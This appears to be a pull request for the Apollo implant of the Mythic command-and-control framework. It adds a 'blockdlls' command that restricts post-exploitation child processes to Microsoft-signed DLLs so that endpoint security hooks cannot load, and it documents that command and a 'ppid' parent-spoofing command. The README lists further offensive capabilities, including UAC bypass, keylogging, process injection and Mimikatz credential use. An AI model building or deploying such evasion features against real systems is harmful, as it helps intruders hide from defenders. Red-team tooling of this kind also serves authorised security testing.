### PR TITLE
blockdlls

### DIFF
--- a/Payload_Type/apollo/agent_code/Apollo/Apollo.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Apollo.cs
@@ -22,7 +22,7 @@ namespace Apollo
     {
 
 #if DEBUG
-        public static string AgentUUID = "2e3b9405-a923-472e-b7dd-90b562a6354f";
+        public static string AgentUUID = "8efc9695-46a7-4f55-ae38-892ec43f3c87";
 #endif
 
         [STAThread]
@@ -38,7 +38,7 @@ namespace Apollo
             }
             else
             {
-                profile = new DefaultProfile(AgentUUID, "MHrH1Ui9kdUqZqwEZgRGrVHUcwLI4nejWcQL577smKA=");
+                profile = new DefaultProfile(AgentUUID, "48OJw9IWxquvk58QhHOPV0j562sqMVPKvMMya/dsdng=");
             }
 #else
             DefaultProfile profile = new DefaultProfile();

--- a/Payload_Type/apollo/agent_code/Apollo/Apollo.csproj
+++ b/Payload_Type/apollo/agent_code/Apollo/Apollo.csproj
@@ -121,6 +121,7 @@
     <Reference Include="System.Xml" />
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="CommandModules\BlockDlls.cs" />
     <Compile Include="CommandModules\BypassUac.cs" />
     <Compile Include="CommandModules\Inject.cs" />
     <Compile Include="CommandModules\Keylog.cs" />

--- a/Payload_Type/apollo/agent_code/Apollo/CommandModules/BlockDlls.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/CommandModules/BlockDlls.cs
@@ -1,0 +1,58 @@
+﻿#define COMMAND_NAME_UPPER
+
+#if DEBUG
+#undef BLOCKDLLS
+#define BLOCKDLLS
+#endif
+
+#if BLOCKDLLS
+using System;
+using System.Linq;
+using System.Text;
+using Apollo.Jobs;
+using Apollo.Tasks;
+using Apollo.Evasion;
+using Newtonsoft.Json;
+
+namespace Apollo.CommandModules
+{
+    class BlockDlls
+    {
+
+        public struct BlockDllArgs
+        {
+            public bool block;
+        }
+
+        /// <summary>
+        /// Change the sacrificial process that's spawned for certain post-exploitation jobs
+        /// such as execute assembly. Valid taskings are spawnto_x64 and spawnto_x86. If the
+        /// file does not exist or the file is not of an executable file type, the job
+        /// will return an error message.
+        /// </summary>
+        /// <param name="job">Job associated with this task. The filepath is specified by job.Task.parameters.</param>
+        /// <param name="agent">Agent this task is run on.</param>
+        /// 
+        public static void Execute(Job job, Agent agent)
+        {
+            Task task = job.Task;
+            BlockDllArgs args = JsonConvert.DeserializeObject<BlockDllArgs>(job.Task.parameters);
+
+            if (EvasionManager.BlockDlls(args.block))
+            {
+                if (args.block)
+                {
+                    job.SetComplete($"Blocking non-Microsoft-signed DLLs.");
+                } else
+                {
+                    job.SetComplete("All DLLs can be loaded into post-ex processes.");
+                }
+            }
+            else
+            {
+                job.SetError($"Failed to set block DLLs.");
+            }
+        }
+    }
+}
+#endif

--- a/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
@@ -4,6 +4,8 @@
 #undef SPAWNTO_x86
 #undef SPAWNTO_X64
 #undef PPID
+#undef BLOCKDLLS
+#define BLOCKDLLS
 #define SPAWNTO_X86
 #define SPAWNTO_X64
 #define PPID
@@ -21,17 +23,19 @@ namespace Apollo.Evasion
 {
     internal static class EvasionManager
     {
-        private static string SpawnTo64 = "C:\\Windows\\System32\\rundll32.exe";
-        private static string SpawnTo64Args = "";
-        private static string SpawnTo86 = "C:\\Windows\\SysWOW64\\rundll32.exe";
-        private static string SpawnTo86Args = "";
-        private static int ParentProcessId = System.Diagnostics.Process.GetCurrentProcess().Id;
+        private static string _spawnTo64 = "C:\\Windows\\System32\\rundll32.exe";
+        private static string _spawnTo64Args = "";
+        private static string _spawnTo86 = "C:\\Windows\\SysWOW64\\rundll32.exe";
+        private static string _spawnTo86Args = "";
+        private static int _parentProcessId = System.Diagnostics.Process.GetCurrentProcess().Id;
+        private static bool _blockDLLs = false;
 
         internal struct SacrificialProcessStartupInformation
         {
             internal string Application;
             internal string Arguments;
             internal int ParentProcessId;
+            internal bool BlockDlls;
         }
 
         internal static SacrificialProcessStartupInformation GetSacrificialProcessStartupInformation()
@@ -39,15 +43,16 @@ namespace Apollo.Evasion
             SacrificialProcessStartupInformation results = new SacrificialProcessStartupInformation();
             if (IntPtr.Size == 8)
             {
-                results.Application = SpawnTo64;
-                results.Arguments = SpawnTo64Args;
+                results.Application = _spawnTo64;
+                results.Arguments = _spawnTo64Args;
             }
             else
             {
-                results.Application = SpawnTo86;
-                results.Arguments = SpawnTo86;
+                results.Application = _spawnTo86;
+                results.Arguments = _spawnTo86;
             }
-            results.ParentProcessId = ParentProcessId;
+            results.ParentProcessId = _parentProcessId;
+            results.BlockDlls = _blockDLLs;
             return results;
         }
 
@@ -57,9 +62,9 @@ namespace Apollo.Evasion
             bool bRet = false;
             if (FileUtils.IsExecutable(fileName))
             {
-                SpawnTo64 = fileName;
+                _spawnTo64 = fileName;
                 if (!string.IsNullOrEmpty(args))
-                    SpawnTo64Args = args;
+                    _spawnTo64Args = args;
                 bRet = true;
             }
             return bRet;
@@ -71,9 +76,9 @@ namespace Apollo.Evasion
             bool bRet = false;
             if (FileUtils.IsExecutable(fileName))
             {
-                SpawnTo86 = fileName;
+                _spawnTo86 = fileName;
                 if (!string.IsNullOrEmpty(args))
-                    SpawnTo86Args = args;
+                    _spawnTo86Args = args;
                 bRet = true;
             }
             return bRet;
@@ -87,9 +92,16 @@ namespace Apollo.Evasion
             {
                 System.Diagnostics.Process.GetProcessById(processId);
                 bRet = true;
-                ParentProcessId = processId;
+                _parentProcessId = processId;
             } catch { }
             return bRet;
+        }
+#endif
+#if BLOCKDLLS
+        internal static bool BlockDlls(bool status)
+        {
+            _blockDLLs = status;
+            return true;
         }
 #endif
     }

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Constants.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Constants.cs
@@ -7,7 +7,7 @@ namespace Native
     internal static class Constants
     {
         #region CONSTANTS
-
+        public const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;
         public const int HANDLE_FLAG_INHERIT = 1;
         public static uint STARTF_USESTDHANDLES = 0x00000100;
         public const UInt32 INFINITE = 0xFFFFFFFF;
@@ -44,7 +44,8 @@ namespace Native
         public const uint SECURITY_MANDATORY_HIGH_RID = 0x00003000;
         public const uint SECURITY_MANDATORY_SYSTEM_RID = 0x00004000;
 
-
+        public const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;
+        public const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
         #endregion
 
     }

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
@@ -667,6 +667,11 @@ namespace Native
          IntPtr lpReturnSize);
 
         [DllImport("kernel32.dll")]
+        public static extern bool DeleteProcThreadAttributeList(
+            IntPtr lpAttributeList
+        );
+
+        [DllImport("kernel32.dll")]
         internal static extern int GetExitCodeThread(
             IntPtr hThread,
             out int lpExitCode);

--- a/Payload_Type/apollo/agent_code/Apollo/Tasks/Task.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Tasks/Task.cs
@@ -1,6 +1,8 @@
 #define COMMAND_NAME_UPPER
 
 #if DEBUG
+#undef BLOCKDLLS
+#define BLOCKDLLS
 #undef PPID
 #define PPID
 #undef BYPASSUAC
@@ -488,6 +490,9 @@ namespace Apollo
 #endif
 #if PPID
                 { "ppid", "Ppid" },
+#endif
+#if BLOCKDLLS
+                { "blockdlls", "BlockDlls" },
 #endif
 
             };

--- a/Payload_Type/apollo/mythic/agent_functions/blockdlls.py
+++ b/Payload_Type/apollo/mythic/agent_functions/blockdlls.py
@@ -43,7 +43,10 @@ class BlockDllsCommand(CommandBase):
 
     async def create_tasking(self, task: MythicTask) -> MythicTask:
         block = task.args.get_arg("block")
-        task.display_params = "{}".format(block)
+        if block:
+            task.display_params = "on"
+        else:
+            task.display_params = "off"
         return task
 
     async def process_response(self, response: AgentResponse):

--- a/Payload_Type/apollo/mythic/agent_functions/blockdlls.py
+++ b/Payload_Type/apollo/mythic/agent_functions/blockdlls.py
@@ -1,0 +1,50 @@
+from mythic_payloadtype_container.MythicCommandBase import *
+import json
+
+
+class BlockDllsArguments(TaskArguments):
+
+    def __init__(self, command_line):
+        super().__init__(command_line)
+        self.args = {
+            "block": CommandParameter(name="Block Non-Microsoft DLLs", type=ParameterType.Boolean, required=True, default_value=True),
+        }
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise Exception("No PPID given on command line.")
+        if self.command_line[0] == "{":
+            self.load_args_from_json_string(self.command_line)
+        else:
+            cmd = self.command_line.strip().lower()
+            if cmd == "true" or cmd == "on":
+                self.add_arg("block", True, ParameterType.Boolean)
+            elif cmd == "false" or cmd == "off":
+                self.add_arg("block", False, ParameterType.Boolean)
+            else:
+                raise Exception("Invalid command line arguments for blockdlls.")
+            
+
+class BlockDllsCommand(CommandBase):
+    cmd = "blockdlls"
+    needs_admin = False
+    help_cmd = "blockdlls"
+    description = "Block non-Microsoft DLLs from loading into sacrificial processes."
+    version = 1
+    is_exit = False
+    is_file_browse = False
+    is_process_list = False
+    is_download_file = False
+    is_upload_file = False
+    is_remove_file = False
+    author = "@djhohnstein"
+    argument_class = BlockDllsArguments
+    attackmapping = ["T1055"]
+
+    async def create_tasking(self, task: MythicTask) -> MythicTask:
+        block = task.args.get_arg("block")
+        task.display_params = "{}".format(block)
+        return task
+
+    async def process_response(self, response: AgentResponse):
+        pass

--- a/Payload_Type/apollo/mythic/agent_functions/blockdlls.py
+++ b/Payload_Type/apollo/mythic/agent_functions/blockdlls.py
@@ -28,7 +28,7 @@ class BlockDllsArguments(TaskArguments):
 class BlockDllsCommand(CommandBase):
     cmd = "blockdlls"
     needs_admin = False
-    help_cmd = "blockdlls"
+    help_cmd = "blockdlls [on|off]"
     description = "Block non-Microsoft DLLs from loading into sacrificial processes."
     version = 1
     is_exit = False

--- a/README.md
+++ b/README.md
@@ -24,6 +24,7 @@ Once installed, restart Mythic to build a new agent.
 Command | Syntax | Description
 ------- | ------ | -----------
 assembly_inject | `assembly_inject [pid] [arch] [assembly] [args]` | Execute .NET assembly in remote process.
+blockdlls | `blockdlls [on|off]` | Block non-Microsoft signed DLLs from loading into post-ex jobs.
 bypassuac | `bypassuac (modal popup)` | Bypass UAC using the trusted mock directory technique.
 cat | `cat [file]` | Retrieve the output of a file.
 cd | `cd [dir]` | Change working directory.
@@ -62,6 +63,7 @@ psexec | `psexec` | Pivot to a remote computer by creating a new service. Modal 
 psimport | `psimport` | Reigster a powershell script to import on subsequent execution in `powerpick`/`psinject`/`powershell` commands. Can import more than one script (e.g., PowerView and PowerUp can both be loaded simultaneously.) To clear the script imports, use `psclear`.
 psinject | `psinject [pid] [x86/x64] [command]` | Executes PowerShell in the process specified by `[pid]`. Note: Currently stdout is not captured of child processes if not explicitly captured into a variable or via inline execution (such as `$(whoami)`).
 pth | `pth` | Modal popup. Use Mimikatz to patch LSASS and import credentials into memory.
+ppid | `ppid [pid]` | Set the parent process ID of post-ex jobs to the specified PID.
 pwd | `pwd` | Print working directory.
 reg_query_subkeys | `reg_query_subkeys` | Query all subkeys of the specified registry path. Needs to be of the format `HKCU:\`, `HKLM:\`, or `HKCR:\`.
 reg_query_values | `reg_query_values` | Query all values of the specified registry path. Needs to be of the format `HKCU:\`, `HKLM:\`, or `HKCR:\`.

--- a/documentation-payload/apollo/commands/_index.md
+++ b/documentation-payload/apollo/commands/_index.md
@@ -71,6 +71,8 @@ pre = "<b>2. </b>"
     * [reg_query_values](/agents/apollo/commands/reg_query_values/)
     * [reg_write_value](/agents/apollo/commands/reg_write_value/)
 - Evasion Management
+    * [blockdlls](/agents/apollo/commands/blockdlls)
+    * [ppid](/agents/apollo/commands/ppid)
     * [spawnto_x64](/agents/apollo/commands/spawnto_x64/)
     * [spawnto_x86](/agents/apollo/commands/spawnto_x86/)
     * [get_current_injection_technique](/agents/apollo/commands/get_current_injection_technique/)

--- a/documentation-payload/apollo/commands/blockdlls.md
+++ b/documentation-payload/apollo/commands/blockdlls.md
@@ -1,0 +1,17 @@
++++
+title = "blockdlls"
+chapter = false
+weight = 103
+hidden = true
++++
+
+## Summary
+Prevent non-Microsoft signed DLLs from loading into post-exploitation jobs.
+
+## Usage
+```
+blockdlls [on|true|off|false]
+```
+
+## Detailed Summary
+The `blockdlls` command will set the process mitigation policy to Microsoft-signed only. This is one of two process attributes you can set in fork and run jobs, and is set via the StartupInfoEx structure.

--- a/documentation-payload/apollo/commands/ppid.md
+++ b/documentation-payload/apollo/commands/ppid.md
@@ -1,0 +1,17 @@
++++
+title = "ppid"
+chapter = false
+weight = 103
+hidden = true
++++
+
+## Summary
+Set the parent process to the specified process identifier for all post-exploitation jobs.
+
+## Usage
+```
+ppid [pid]
+```
+
+## Detailed Summary
+The `ppid` command will set the parent process to the specified process identifier for all post-exploitation jobs. This is one of two attributes you can set for fork-and-run jobs, which all start up using the StartupInfoEx structure.


### PR DESCRIPTION
This PR integrates `blockdlls` command which blocks non-Microsoft signed DLLs from loading into post-ex jobs.